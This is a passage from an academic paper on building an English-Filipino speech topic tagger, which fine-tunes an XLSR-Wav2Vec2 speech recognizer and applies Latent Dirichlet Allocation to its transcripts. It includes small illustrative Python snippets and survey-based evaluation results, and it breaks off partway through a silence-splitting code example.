There have been attempts to create an Automatic Speech Recognition system for Filipino. Hernandez, Reyes, & Fajardo (2020) built an ASR using Convolutional Neural Networks [6] that directly maps spectrogram images to phonemes and speech representations. Briones, Cai, Te, & Pascual (2020) also developed an Automatic Speech Recognizer for Filipino-Speaking Children [7]. These studies are important baselines for Automatic Speech Recognition in Filipino, as Filipino is considered a low-resource language compared to other languages in the world.

2.1 Latent Dirichlet Allocation

Blei, Ng, & Jordan (2003) described Latent Dirichlet Allocation (LDA) as a generative probabilistic model for collections of discrete data such as text corpora. LDA is a three-level hierarchical Bayesian model in which each item of a collection is modeled as a finite mixture over an underlying set of topics. In the LDA model, two distributions are generated to explore the topics in a document: a document-topic distribution and a topic-word distribution. LDA is an unsupervised model, which makes it fit several use cases of topic modeling.

Krestel, Fankhauser, & Nejdl (2009) investigated the use of LDA for collective tag recommendation [8]. In their study, LDA recommended more tags and achieved better accuracy, precision, and recall than the standard association rules previously suggested for tag recommendation. Today, numerous tag recommendation systems have been studied for software information sites, such as the work of Wang et al. (2017) on EnTagRec and EnTagRec++ [9], which used a labeled LDA [10] that enabled the software to pre-define a set of tags as the target topics to be assigned to documents.

Newer comparative studies have also been conducted, such as the dissertation of Anaya (2011) and the study of Kalepalli, Tasneem, Phani Teja & Manne (2019), which compared Latent Semantic Analysis (LSA) and Latent Dirichlet Allocation (LDA). These studies were conducted to help organizations mine, organize, and identify data from online documents following the emergence of web technologies. The former study found that LDA had better accuracy (82.57 vs. 75.3 for LSA) and divergence. Additionally, Liu, Du, Sun, and Jiang (2020) proposed an interactive Latent Dirichlet Allocation model that employs a new indicator to measure topic quality [11]. Besides the standard objective topic-word distribution, their proposed model considers the subjective topic-word distribution. Based on their experiments, their model can mine high-quality topics and is more robust than the standard LDA model. LDA has been recognized as a useful tool in several use cases, but it still has limitations in areas such as topic quality and stability [12].
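For reference, the generative process behind the two distributions mentioned in this subsection can be written compactly. The notation below follows the standard formulation of LDA by Blei, Ng, & Jordan (2003) and is not defined elsewhere in this paper, so the symbols should be read as assumptions: $\alpha$ is the Dirichlet prior, $\theta$ is the document-topic distribution of one document, $z_n$ is the topic assigned to the $n$-th word $w_n$, $\beta$ holds the topic-word probabilities, and $N$ is the number of words in the document.

```latex
\begin{align}
\theta &\sim \mathrm{Dirichlet}(\alpha), \\
z_n \mid \theta &\sim \mathrm{Multinomial}(\theta), \qquad n = 1, \dots, N, \\
w_n \mid z_n, \beta &\sim \mathrm{Multinomial}(\beta_{z_n}), \\
p(\theta, \mathbf{z}, \mathbf{w} \mid \alpha, \beta)
  &= p(\theta \mid \alpha) \prod_{n=1}^{N} p(z_n \mid \theta)\, p(w_n \mid z_n, \beta).
\end{align}
```

The three levels of the hierarchy are visible here: $\alpha$ and $\beta$ are corpus-level parameters, $\theta$ is drawn once per document, and $z_n$ and $w_n$ are drawn once per word.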
J. K. B. Tumpalan and R. N. C. Recario
3 Materials and Methods
To implement the speech topic tagger, an Automatic Speech Recognition model was built to transcribe speech data. Latent Dirichlet Allocation was then applied to the transcriptions to produce the topic distributions. The order of the process is illustrated in Fig. 1.
Fig. 1. Speech topic tagging process implemented in this research composed of several stages.
The ASR system used the XLSR approach by Conneau, Baevski, Collobert, Mohamed, & Auli (2020). A visualization of the XLSR model by these authors is shown in Fig. 2. The model uses speech inputs from multiple languages and learns to share discrete tokens across languages, creating bridges between them.
Fig. 2. ASR architecture – XLSR approach [13]
In their paper, Conneau et al. highlighted the effectiveness of unsupervised cross-lingual representation in terms of Phoneme Error Rate (PER) by comparing XLSR to
several baseline results from Rivière et al. (2020) and other monolingual models that are pretrained with one or ten languages and fine-tuned on one or ten languages. Figure 3 shows this comparison of models from the same paper. This comparison is also the main rationale for using the XLSR-53 models in the transfer learning process.
Fig. 3. Common voice and baseline phoneme error rate [13, 14]
3.1 Dataset
English. The pre-trained English Automatic Speech Recognition model of Jonatas Grosman (jonatasgrosman) [15] was built on the Common Voice Corpus by Mozilla.org, an open-source, multi-language data set of voices that anyone can use to train speech-enabled applications. That model was trained and tested using Common Voice Corpus 6.1, the version released in December 2020. The researchers used a pre-trained model because of the limitations of their own machines and registered cloud services. Common Voice 6.1 has a total size of 56 GB. The data set includes 1,686 validated hours out of 2,181 total hours of speech. It contains up to 66,173 unique voices, with audio in MP3 format.
Filipino. The data set used for fine-tuning the model on the Filipino language came from MagicData of Beijing Magic Data Technology Co., Ltd., and was released in April 2021. Its audio is 16 kHz, 16-bit, mono, in WAV format. This open-source data set consists of 4.58 hours of transcribed, scripted Filipino speech focusing on daily-use sentences. It contains 4,073 utterances contributed by ten speakers, with a total size of 555 MB on disk. Seven speakers were from CARAGA, two were from NCR, and one was from CALABARZON. They were a mixture of male and female participants aged 11 to 36 years old.
3.2 Pre-processing
The audio inputs were pre-processed into the one-dimensional array format expected by XLSR-Wav2Vec2. The WAV files from the MagicHub data set were loaded using Hugging Face's Datasets library. This was done with a custom dataset loading script, similar to the one for Mozilla's Common Voice, so that the data is structured in a Dataset class after loading into the training notebook. The library was used to easily access and share the datasets, the parameters, and the evaluation metrics for the speech recognition tasks. It also uses the Apache Arrow framework, which handles large datasets with zero-copy reads and without memory constraints for optimal speed and efficiency. After the values and sampling rate of the speech data were stored, the data was resampled to match the sampling rate of the data used to pre-train the XLSR-Wav2Vec2 model. It is crucial to verify that the data used to fine-tune the model has the same sampling rate as the data used to pre-train it, which is 16 kHz. The data was downsampled using the task preparation methods of the Dataset object from Hugging Face.
3.3 Modeling
Automatic Speech Recognition models transcribe speech data to text data. Two important components of the modeling part are feature extraction and the training phase. This subsection describes each of these components.
Feature Extractor and Tokenizer. The Wav2Vec2 model has a built-in feature extractor, Wav2Vec2FeatureExtractor, and a tokenizer, Wav2Vec2Tokenizer. Both classes were wrapped into a single Wav2Vec2Processor so that the modeling process requires only two objects, a processor and a model, instead of three.
Training. After the data was processed, Hugging Face's Trainer was used to fine-tune the pre-trained XLSR-Wav2Vec2 English model on Filipino. Trainer is a class that provides an Application Programming Interface (API) for a feature-complete training and evaluation loop for PyTorch. The necessary hyperparameter tuning was applied to get the best results in the first few training runs. The researchers used a cloud computing platform, the Google Colaboratory Notebook, to train the model because their own physical machines were unable to handle the stress of the training process in terms of disk, CPU, and GPU usage.
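The sampling-rate requirement from Sect. 3.2 can be illustrated with a small standalone sketch. It resamples a one-dimensional signal to 16 kHz by linear interpolation. This is not the Hugging Face routine the researchers used; the function name `resample_linear` and the test signal are hypothetical, and a production resampler would apply a low-pass filter before downsampling.

```python
TARGET_RATE = 16_000  # sampling rate of the XLSR-Wav2Vec2 pre-training data (Sect. 3.2)


def resample_linear(samples, src_rate, dst_rate=TARGET_RATE):
    """Resample a 1-D list of floats by linear interpolation.

    Illustrative only: real pipelines low-pass filter the signal
    before downsampling to avoid aliasing.
    """
    if src_rate == dst_rate or len(samples) < 2:
        return list(samples)
    n_out = int(round(len(samples) * dst_rate / src_rate))
    out = []
    for i in range(n_out):
        pos = i * src_rate / dst_rate           # position in the source signal
        left = int(pos)
        right = min(left + 1, len(samples) - 1)
        frac = pos - left
        out.append(samples[left] * (1.0 - frac) + samples[right] * frac)
    return out


# One second of a hypothetical 48 kHz ramp signal.
one_second = [i / 48_000 for i in range(48_000)]
resampled = resample_linear(one_second, 48_000)
print(len(resampled))
```

After resampling, one second of audio always holds 16,000 values, which is the input length per second that the pre-trained model expects.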
3.4 Topic Modeling: Latent Dirichlet Allocation
The researchers performed data pre-processing and generation using the gensim and nltk Python libraries.
Pre-processing. The pre-processing is composed of tokenization and stop word removal phases. In tokenization, the whole ASR output was split into sentences, and the sentences were split into words. The words were lowercased, and punctuation was removed. In the stop word removal phase, stop words, that is, words that do not carry much relevance or information for the text, were removed.
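The two pre-processing phases can be sketched with the Python standard library alone. The study used gensim and nltk; the stop word list below is a tiny hypothetical stand-in, because the actual list is not given in the text.

```python
import re
import string

# Tiny hypothetical stop word list; the study's actual list is not given in the text.
STOP_WORDS = {"ang", "ng", "sa", "na", "the", "of", "is"}


def preprocess(transcript):
    """Split a transcript into sentences, then into lowercased words without
    punctuation, and drop stop words. Returns one token list per sentence."""
    sentences = [s for s in re.split(r"[.!?]+", transcript) if s.strip()]
    strip_punct = str.maketrans("", "", string.punctuation)
    result = []
    for sentence in sentences:
        words = sentence.lower().translate(strip_punct).split()
        result.append([w for w in words if w not in STOP_WORDS])
    return result


print(preprocess("Ang ganda ko naman kung ganun! Sa may malapit dito sa bahay."))
```

The order matters: lowercasing and punctuation removal come first so that the stop word lookup matches regardless of capitalization or trailing punctuation.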
Generation. To generate the topics, the researchers ran LDA using term frequency-inverse document frequency (TF-IDF) to create features from text. The TF-IDF model captures which words are more important and which are less important. For each pre-processed document, a dictionary is created to keep the number and frequency of words. A TF-IDF model is created from this dictionary before Latent Dirichlet Allocation is run to generate the word-topic distributions.
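As a rough illustration of the TF-IDF step, the sketch below weights each word by its count in a document times the base-2 logarithm of the inverse document frequency. It is a simplified stand-in for a library model: the exact weighting and normalization used in the study are not stated, and the three toy documents are hypothetical.

```python
import math
from collections import Counter


def tfidf(documents):
    """Compute a simple TF-IDF weight for every word of every document.

    documents: list of token lists. Returns one {word: weight} dict per document.
    Weight = (term count in document) * log2(N / document frequency).
    """
    n_docs = len(documents)
    doc_freq = Counter(word for doc in documents for word in set(doc))
    weights = []
    for doc in documents:
        counts = Counter(doc)
        weights.append({w: c * math.log2(n_docs / doc_freq[w]) for w, c in counts.items()})
    return weights


# Hypothetical pre-processed documents.
docs = [
    ["buhay", "tao", "buhay"],
    ["tao", "love"],
    ["love", "friends", "tao"],
]
for row in tfidf(docs):
    print(row)
```

A word that occurs in every document, such as "tao" here, receives a weight of zero, which is how TF-IDF pushes down words that do not help distinguish one document from another.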
3.5 Evaluation
ASR: Word Error Rate (WER). WER is recommended by the US National Institute of Standards and Technology for evaluating the performance of ASR systems [16]. It is computed as the number of transcription errors that the system makes divided by the number of words that the speaker actually said. The higher the WER, the less accurate the system. WER counts three categories of errors: 1) substitutions, when the system transcribes one word in place of another; 2) deletions, when the system misses a word entirely; and 3) insertions, when the system adds a word to the transcript that the speaker did not say.
Topic Modeling: Observation-Based Approach. Quantitative evaluation techniques cannot be fully implemented for the Filipino language due to resource limitations in terms of corpus, dictionary, and phrase models. Because of this, the researchers adopted an alternative approach to evaluating the topic models: human judgement through observation. The topics identified by the topic models were presented to different respondents, who were asked whether these topics were related to the main audio data that was fed to the tagger. Topic modeling does not consider the semantics of topics, especially in low-resource languages, so evaluating the topic output of the tagger inevitably required human interpretation.
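The WER definition above can be written as a word-level edit distance divided by the number of reference words. The sketch below is a generic implementation, not the evaluation code used in the study; the example pair is the second row of Table 2.

```python
def word_error_rate(reference, hypothesis):
    """WER = (substitutions + deletions + insertions) / number of reference words,
    computed with a word-level edit distance."""
    ref = reference.lower().split()
    hyp = hypothesis.lower().split()
    if not ref:
        raise ValueError("reference must contain at least one word")
    # dist[i][j] = edits needed to turn the first i reference words
    # into the first j hypothesis words.
    dist = [[0] * (len(hyp) + 1) for _ in range(len(ref) + 1)]
    for i in range(len(ref) + 1):
        dist[i][0] = i  # i deletions
    for j in range(len(hyp) + 1):
        dist[0][j] = j  # j insertions
    for i in range(1, len(ref) + 1):
        for j in range(1, len(hyp) + 1):
            cost = 0 if ref[i - 1] == hyp[j - 1] else 1
            dist[i][j] = min(
                dist[i - 1][j] + 1,         # deletion
                dist[i][j - 1] + 1,         # insertion
                dist[i - 1][j - 1] + cost,  # match or substitution
            )
    return dist[len(ref)][len(hyp)] / len(ref)


# Example pair taken from Table 2.
print(word_error_rate("Sa ganang akin lang naman ito", "saga ng akin lang naman ito"))
```

For this pair, two of the six reference words are substituted, so the WER is 2/6, even though the prediction sounds almost identical when read aloud. This shows how WER penalizes spelling and word-boundary errors in full.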
4 Results and Discussion
The English-Filipino Speech Topic Tagger is executable code on a web-based interactive computing platform, Google Colaboratory. Anyone can make a copy of the notebook via Google Colab and test its functionality using their own pre-processed data and their own dataset script. Predictions are generated automatically, and the topic salience is visualized, after all necessary inputs are changed and all the cells in the notebook are run. As planned, the Speech Topic Tagger solution was pipelined in two parts: transcription using an English-Filipino Automatic Speech Recognition (ASR) model, and topic modeling using a generative statistical model, Latent Dirichlet Allocation. The researchers trained several models to observe the training results and to select the most optimized model for the solution pipeline of the Speech Tagger. The next sections show: (a) the training evaluation of the English-Filipino Automatic Speech
Recognition Models; (b) a comparison of the English-Filipino ASR model to the Filipino-only ASR model; (c) the results of the tagger on some YouTube videos pre-processed to become input data sets; and (d) the users' evaluation of the output of the speech tagger.
4.1 English XLSR Wav2Vec2 Fine-Tuned to Filipino
A total of nine English-Filipino models were trained. Table 1 lists the general hyperparameters used by the Hugging Face Trainer to train the models; the models differ mainly in the number of epochs and the value of the learning rate.
Table 1. General hyperparameters for fine-tuning the XLSR-Wav2Vec2 models
Parameter | Value
Learning rate | 0.001, 0.002, and 0.0003
Train batch size | 8
Evaluation batch size | 8
Gradient accumulation steps | 2
Total train batch size | 16
Optimizer | Adam with betas and epsilon
Learning rate scheduler | Linear
Learning rate scheduler warmup steps | 500
Number of epochs | 20, 30, 40
The parameters in Table 1 yielded the training loss, validation loss, and word error rate shown in Fig. 4 for each learning rate and epoch variation. Out of the 4,073 utterances, 3,055 utterances (75% of the speech files) were used for training the models, while the remaining 1,018 utterances (25%) were used for model evaluation. The validation set was also used for testing the initial solution of the Speech Topic Tagger.
Fig. 4. Model evaluation per epoch, learning rates: 0.0003, 0.001, 0.002
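The split sizes and the total train batch size reported above follow from simple arithmetic, and the linear scheduler with warmup can be written as a short function. The sketch below is an assumption-laden illustration rather than the Trainer's internal code: `optimizer_steps` and `linear_lr` are hypothetical helper names, and the step count assumes the last partial batch of each epoch is kept.

```python
import math

TOTAL_UTTERANCES = 4073
TRAIN_FRACTION = 0.75
PER_DEVICE_BATCH = 8
GRAD_ACCUM_STEPS = 2
WARMUP_STEPS = 500

train_size = round(TOTAL_UTTERANCES * TRAIN_FRACTION)   # 3,055 utterances
eval_size = TOTAL_UTTERANCES - train_size                # 1,018 utterances
effective_batch = PER_DEVICE_BATCH * GRAD_ACCUM_STEPS    # 16


def optimizer_steps(epochs):
    """Approximate number of optimizer updates, assuming the last partial
    batch of each epoch is kept (an assumption; not stated in the text)."""
    return math.ceil(train_size / effective_batch) * epochs


def linear_lr(step, base_lr, total_steps, warmup=WARMUP_STEPS):
    """Linear warmup to base_lr, then linear decay to zero."""
    if step < warmup:
        return base_lr * step / warmup
    return base_lr * max(0.0, (total_steps - step) / (total_steps - warmup))


total = optimizer_steps(30)
print(train_size, eval_size, effective_batch, total)
print(linear_lr(250, 3e-4, total), linear_lr(500, 3e-4, total), linear_lr(total, 3e-4, total))
```

With gradient accumulation, the optimizer updates once per 16 utterances even though only 8 fit on the GPU at a time, which is why Table 1 lists a total train batch size of 16.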
As displayed in the evaluation, the trained models overfit the training data. The training losses ranged from 0.029 to 0.129, but the validation losses ranged from 0.45 to 1.58. The model does not work well with new data because of the limited data points present in training. Two of the trained models displayed better training loss, validation loss, and word error rate than the other models. The first model, trained for 40 epochs with a learning rate of 0.0003, yielded a training loss of 0.0294, a validation loss of 0.4561, and a word error rate of 0.2632. The second model, trained for 30 epochs with a learning rate of 0.0003, yielded a training loss of 0.0395, a validation loss of 0.4738, and a word error rate of 0.268. Comparing the two, the first model produced the lower sum of errors on the training and validation sets. It also had a slightly better word error rate than the 30-epoch model. However, since the models were overfitting, the researchers chose the model with a good error rate but the best fit. When the metrics are charted on a log-scaled axis, the 30-epoch model displays a better fit than the 40-epoch model. The training loss of the 30-epoch model was 8.34% of its validation loss, while the training loss of the 40-epoch model was just 6.45% of its validation loss. To visualize this further, the normal and log-scaled versions of the loss metrics are displayed in Fig. 5. The researchers considered only the fit, since the 40-epoch model had only a 0.52% word error rate improvement over the 30-epoch model and the gap between its training loss and validation loss was wider. For this reason, the 30-epoch model was used for the implementation of the speech topic tagger.
Fig. 5. Epoch 30 and 40, Normal vs Log-scaled training loss and validation loss
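The fit comparison in the text reduces to the ratio of training loss to validation loss. The short sketch below recomputes that ratio from the reported values; the helper name `loss_ratio_percent` is hypothetical.

```python
# (training loss, validation loss, WER) as reported in the text.
models = {
    "epochs=40, lr=0.0003": (0.0294, 0.4561, 0.2632),
    "epochs=30, lr=0.0003": (0.0395, 0.4738, 0.268),
}


def loss_ratio_percent(train_loss, val_loss):
    """Training loss expressed as a percentage of validation loss.
    A value closer to 100% means the two losses are closer together."""
    return 100.0 * train_loss / val_loss


for name, (train_loss, val_loss, wer) in models.items():
    print(f"{name}: ratio={loss_ratio_percent(train_loss, val_loss):.2f}%  WER={wer}")
```

A higher percentage means the training and validation losses are closer together, which is the sense in which the 30-epoch model is described as the better fit despite its slightly higher word error rate.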
Some model predictions on the validation set are displayed in Table 2. The predictions were almost perfect, and word errors were barely present in the first few examples of the validation set. The same was the case when the model predictions were tested in real time or from recordings using Hugging Face's Hosted Inference API. In this method, the automatic speech recognition model was loaded into the browser. Users can record audio through their browsers and compute predictions, or simply enable the real-time recognition feature and speak into their microphone while the model processes the speech signals simultaneously. The model was observed to have trouble spelling its predictions correctly, as sounds can be matched to either Filipino or English phonemes. More ASR model predictions using the Inference API are presented in Table 3.
Table 2. Model prediction examples – validation set
Speech | Model prediction
Sa may malapit dito sa bahay | sa may malapit dito sa bahay
Sa ganang akin lang naman ito | saga ng akin lang naman ito
Ang ganda ko naman kung ganun! | Ang ganda ko naman kung ganun
Parang ang sarap mag karaoke pag uwi | Parang ang sarap magkarooke pag-ui
Table 3. Model prediction examples – inference API
Speech | Model prediction
Ang pinakamahalaga, the people before the government | ang pinakamahalaga da pipal before the gobernment
Ito ay demonstration ng aking SP | ito ay demonstration ng aking s p
Graduate ka na ba? | gradwit ka na ba
Saang company ka nag-apply? | Saang kampani ka nag aply
4.2 Comparison of Transcriptions: Base XLSR-Wav2Vec2 Model Fine-Tuned to Filipino
To assess the effectiveness of fine-tuning from a pre-trained English XLSR-Wav2Vec2 model, a base XLSR-Wav2Vec2 model fine-tuned to Filipino was also created. Both models were trained using the same training parameters and differed only in the base model used for transfer learning. To further test the models, three videos sourced from YouTube with different levels of noise were pre-processed and fed to the ASR models. The videos were TedxTalks' YouTube video of Sabrina Ongkiko's “What Do You Want To Be?”, Rec-Create's YouTube video “We Asked People About The First Time They Fell in Love”, and Rec-Create's YouTube video “What does the Anti-Terror Law Even Mean?”. Tables 4, 5, and 6 show the predictions of the models for specific excerpts of the audio data. The introduction and ending of each audio file were removed, and the audio was then split into five-second segments, because the virtual machine cannot handle batches of long audio clips due to GPU RAM limitations during training. The first YouTube video, the TEDx talk of Sabrina Ongkiko, has little to no noise; what noise there is comes from audience members responding to some questions and from the interactivity of her presentation.
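The five-second splitting described above can be sketched as a fixed-size chunking of the sample array. The code assumes 16 kHz mono audio already loaded as a flat sequence; the function name `split_into_chunks` and the 12-second clip are hypothetical, and the tool the researchers actually used for splitting is not stated.

```python
SAMPLE_RATE = 16_000   # Hz, matching the model's expected input
CHUNK_SECONDS = 5


def split_into_chunks(samples, sample_rate=SAMPLE_RATE, seconds=CHUNK_SECONDS):
    """Cut a 1-D sample sequence into consecutive fixed-length chunks.
    The final chunk may be shorter than the others."""
    size = sample_rate * seconds
    return [samples[i:i + size] for i in range(0, len(samples), size)]


# A hypothetical 12-second clip.
clip = [0.0] * (12 * SAMPLE_RATE)
print([len(c) / SAMPLE_RATE for c in split_into_chunks(clip)])
```

Fixed-length cuts keep memory use per batch predictable, but they can split a word across two chunks, which may contribute to the fragmentary row boundaries visible in Tables 4 to 6.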
Table 4. Model prediction examples – external YouTube data (No to Low-Noise) – TedxTalks' YouTube video of Sabrina Ongkiko's “What Do You Want To Be?” (https://www.youtube.com/watch?v=ZKaG0cYztis)
Speech | English-Filipino model prediction | Filipino model prediction
Hanap ang daan para makalabas para kung mawala ka, mananatili ka sa loob | hanap angdaan para makalabas at kung mawala ka mayanatili ka sa loo | hanapang daan para makalabas at kung mawala ka mananatili ka sa loo
Ganoon ang buhay ni jackson. Laking kalye si | ob ganon ang buhay ni jackson lakingkalye si | ob ganun ang buhay ni jackson laking kalya si
jackson. Ang tatay niya ay nakakakulong. Ang nanay niya | jackson ang tatay niya ay nakakulong ang nanay niya | jakzon ang tatay niya ay nakakulong ang nanay niya
Table 5. Model prediction examples – external YouTube data (Medium-Noise) – Rec-Create's YouTube video “We Asked People About the First Time They Fell in Love” (https://www.youtube.com/watch?v=-d8pAMQ_USk)
Speech | English-Filipino model prediction | Filipino model prediction
To fight for our love kahit na ayaw ng parents ko, that's why any kind of relationship | o fighth fur our love kahit nayo nag perints ko datswy any kind nerelation ship masis | u fiht for ar love kahit nayo ng pariens co datsway aenny kyndaverlation cif maseo
The first time I fell in love was in fourth grade.. grade seven ako | the first time ay fell in love was ten fourthgame radseven akoo | safirs tim ay fellen love vhuss kenfort grad reaade seven ako
We were sort of rivals, hanggang ngayon magkakilala parin kami, I liked her con(tinuously) | nsi were sort of rivals hanggang ngayon magkakilala paring gami ay likeh herco | ensiver sourtof rivals hanggang ngayon magkakilala paring kami ay lihkhercon
The second YouTube video, about first love experiences, has low-volume background music throughout. The last data set, labeled as high noise, has strong electronic background music with frequent bass drops. According to the training evaluation of both models at their 5,600th step, the English-Filipino model yielded a lower word error rate, 26.84%, than the Filipino-only model, 29.22%. The prediction examples also show that the predictions of the English-Filipino model tend to be closer to the speech than those of the Filipino model, as some of the speakers frequently code-switch in their scripts.
Table 6. Model prediction examples – external YouTube data (High-Noise) – Rec-Create's YouTube video “What does the Anti-Terror Law Even Mean?” (https://www.youtube.com/watch?v=MBS1jnfCCCs)
Speech | English-Filipino model prediction | Filipino model prediction
..dapat kung ano ang trabaho ng isang branch ng gobyerno, hindi dapat ito kinukuha | ay dapat kung ano ang trabaho ng isang branch ng gobyerno hindi dapat ito ginukuha | y dapat kung ano ang trabaho ng isang branch ng gobyerno hindi dapat ito ginokuha
this consist of different types of crimes, involving killings, kidnappings | dis consist of different types of crimes involving killinks kidnapings | disconsist ob difrient tpsof crimes emvolving kilings kidnappings
At pagkalat ng feat at panic sa mga tao. Present time, the human security a(ct) | at pagkalat ng feare at panic sa mga tao present tme dahuman sikurti a | at pagkalad ng sire at panik sa mga tao presen time duhunman sigurty a
4.3 Topic Tagger Results
The researchers initially tested the topic modeling technique on the validation set. The visualization of topic salience values is displayed in Fig. 6.
Fig. 6. Overall term frequency of the top salient terms in the speech tagger results for the validation set
Among the top salient terms of the validation set, the most salient term is ‘mo’, which in Filipino refers to the second person from the speaker's point of view. This is sensible, as the Filipino data that the researchers used to train the model was a corpus of utterances from daily informal conversations in Filipino/Tagalog. Continuing the solution for the topic tagger, the predictions of the automatic speech recognition model on the test data presented before this section were also used
to yield topic distributions using Latent Dirichlet Allocation. Figures 7, 8, and 9 show the top salient terms in the speech data that was fed in, and the top words that the tagger predicts to be useful for inferring the topics of the speech data. These top words are considered the output of the speech topic tagger.
Fig. 7. Speech tagger results in “What Do You Want To Be?” by Sabrina Ongkiko in TedxTalks PH
Fig. 8. Speech tagger results in Rec-Create's interview video about first love experiences
Fig. 9. Speech tagger results in Rec-Create's documentary about anti-terror law
4.4 Evaluation of the Topic Models
As seen in the visualizations and results, some of the words were incomprehensible, while others can be partially considered Filipino stop words. To evaluate the correctness of the salient topics produced by the topic models, that is, the results of the speech topic tagger, 15 respondents were asked to answer a survey in an observation-based approach. The survey has a separate section for each input. The first instruction was to check all the words that the respondents thought were related, regardless of relevance, to the topics discussed in the linked video. If they left some words unchecked, they were asked to select the most probable reason why they considered the unchecked topics unrelated. The second instruction was to check all the keywords that they thought would be helpful in inferring the topics discussed in the linked video, and to select the most probable reason why they considered that the unchecked topics or words could not be used for topic inference. For every input, a total of 30 topics were shown to the respondents for the first instruction. As for the second instruction, the total number of items in the question about
topic inference is initially 30 but can decrease because of duplicates within the top five keywords, ranked by weight (importance) to each topic, from the results of LDA.
What Do You Want To Be? | Sabrina Ongkiko (Talk) - Low to No Noise
• The majority of the respondents (50%+) agreed that 13 of the 30 words from the Top Salient Terms were related.
– 23 of these 30 words were marked as related by about 40% of the total respondents.
– The respondents did not check the rest of the 30 words because they were mentioned in the video but were not related enough.
• The majority of the respondents answered that 6 of the 13 top keywords from Fig. 7 were indeed useful for inference. The words were: pagpili, kahirapan, buhay, mahirap, tao, desisyon, as seen in Fig. 10.
• All of the respondents unchecked some of the items in the top keywords from Fig. 7 because they were mentioned in the video but were not relevant enough to be used for topic inference.
Fig. 10. Useful words from the abstract topics produced from “What Do You Want To Be? – Sabrina Ongkiko (Talk)” based on the respondents
We Asked People about the First Time They Fell in Love (Stories & Experiences) - Medium Noise
• The majority of the respondents (50%+) agreed that only 3 of the 30 words from the Top Salient Terms were related.
– Only 7 of these 30 words were marked as related by about 40% of the total respondents.
– 73.3% of them said that they unchecked the rest of the words because most of them were incomprehensible.
• The majority of the respondents answered that 3 of the 21 top keywords in Fig. 8 were indeed useful for inference. The words were: friends, love, and person, as seen in Fig. 11.
• 53.3% of the total respondents said that they unchecked the rest of the words because most of them were incomprehensible, while the remaining respondents deemed the words not relevant enough to be used for topic inference.
Fig. 11. Useful words from the abstract topics produced from “We Asked People about the First Time They Fell in Love (Stories & Experiences)” based on the respondents
What does the Anti-terror Law Even Mean? (Documentary) - High Noise
• The majority of the respondents (50%+) agreed that 11 of the 30 words from the Top Salient Terms were related.
– 15 of the 30 words were marked as related by 40% of the total respondents.
– 73.3% of them said that they unchecked the rest of the words because they were not related enough even though they were mentioned, while the remaining 26.7% said that the words were incomprehensible.
• The majority of the respondents answered that six of the 19 top keywords in Fig. 9 were indeed useful for inference. The words were: batas, power, tairlow, atax, people, and government, as seen in Fig. 12.
• 26.7% of the respondents said that they unchecked the rest of the words because most of them were incomprehensible, while the remaining 73.3% deemed the words not relevant enough to be used for topic inference.
Fig. 12. Useful words from the abstract topics produced from “What does the Anti-terror Law Even Mean? (Documentary)” based on the respondents
The next few figures are example images of the application's interface when run in Google Colab's interactive Python notebook. Figure 13 shows each abstract topic for the tested YouTube videos. Each word was printed with its weight for each abstract topic. Lastly, Fig. 14 shows a word cloud visualization of the high-frequency words before stop word removal. The visualized stop words were caught by the stop word collection used by the researchers, so the words displayed were not tagged as salient and their weights were disregarded by the model when deriving the abstract topics.
Fig. 13. App Interface 1 – printed topics with their respective weights
Fig. 14. App Interface 2 – wordcloud visualization of high-frequency words before stop words removal
5 Conclusion and Future Work
The researchers were able to implement speech tagging that transcribes speech data using the speech-to-text output of an ASR and extracts context from that output using topic modeling. They were also able to implement modeling techniques to test the compatibility of methods in an ASR system for English-Filipino. Lastly, they were able to evaluate the results of Latent Dirichlet Allocation (LDA) in extracting topics from an English-Filipino audio data collection through transcriptions of an English-Filipino ASR model.
The English-Filipino Speech Topic Tagger performed automatic speech topic tagging by producing words that can be used for topic inference. The tagger was implemented in two parts. It transcribed speech data to text data using a fine-tuned Automatic Speech Recognition model, then extracted context from the text data using Latent Dirichlet Allocation, a generative statistical model. Transfer learning, using the XLSR-Wav2Vec2 model, and hyperparameter tuning, through varied epochs and learning rates, were implemented to test the compatibility of these methods for an English-Filipino ASR. Lastly, the effectiveness of Latent Dirichlet Allocation on the speech-to-text output was evaluated using an observation-based approach. The evaluation confirmed that only some of the keywords produced by the tagger were truly salient, related, and relevant to the input data.
The English-Filipino Speech Topic Tagger still needs many improvements before it can be used by end users. To be considered a usable and reliable application, the tagger should consistently produce relevant topics and should have little to no chance of tagging words unrelated to the speech topic. It did its work as a speech tagger, but due to multiple limitations in creating the ASR model, such as data, hardware, and language resources, it does not fully yield semantically accurate topics.
The ASR model delivered transcriptions, but it incorrectly produced some English phonemes as Filipino, or vice versa. This conflict between the two languages arose because the English and Filipino parts were trained separately on the base XLSR-Wav2Vec2 model. It was observable in words that were spelled incorrectly but had the correct syllables or speech representation in one of the two languages. Overall, it yielded excellent results
for words that were included in the conversational dataset, but it had higher word errors on new input data.
As for Latent Dirichlet Allocation, usual pre-processing techniques like stemming or lemmatization were not applied, because not all words present in the documents can be considered proper words and no stemmers or lemmatizers are available for English-Filipino documents. Despite this, some words in the word-topic distributions representing each topic still proved useful for topic inference. However, the results of the evaluation lean toward the conclusion that a standard LDA implementation is not a good fit for this two-part solution for the English-Filipino Speech Topic Tagger.
Given the above points, the study achieved its objectives. Even though resources and accuracy were a consistent challenge, these conclusions will still be useful for future research endeavors. Future researchers who extend this work can focus on the speech data. The community situation at the time did not make it easy for researchers to source daily scripted and conversational data. Additionally, it was hard to source data from more diverse people with different demographic profiles during the COVID situation. Platforms like Mozilla's Common Voice can therefore be created or utilized for sourcing and delivering a well-structured speech data set for Filipino ASR.
With time and resource limitations, the researchers utilized all available open-source resources. For example, the Colab Notebook was used for the models. The virtual machines allocated to the Colab Notebook can only handle a train and evaluation batch size of eight, despite a premium subscription to the service. This is only a fourth of the usual default batch size, 32, which is a good starting point in making the network compute faster. Additional audio pre-processing can also be implemented, such as splitting at silences using an adaptive dB level threshold. This will eliminate random noise between sentences or phrases and will significantly affect the training of future models if they use random noisy data sourced online.
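One possible reading of "splitting at silences in an adaptive dB level threshold" is sketched below. A frame is treated as silent when its RMS level falls more than a fixed margin below the loudest frame of the same clip, so the threshold adapts to each recording. The frame length, the 30 dB margin, and the function names are hypothetical choices for illustration and were not evaluated in the study.

```python
import math


def frame_db(frame):
    """Root-mean-square level of one frame in dB (relative to full scale 1.0)."""
    rms = math.sqrt(sum(x * x for x in frame) / len(frame))
    return 20.0 * math.log10(max(rms, 1e-10))


def split_on_silence(samples, frame_len=400, margin_db=30.0):
    """Return (start, end) sample ranges of non-silent regions.

    The threshold adapts to the clip: a frame counts as silent when its
    level is more than margin_db below the loudest frame.
    frame_len and margin_db are hypothetical defaults.
    """
    if not samples:
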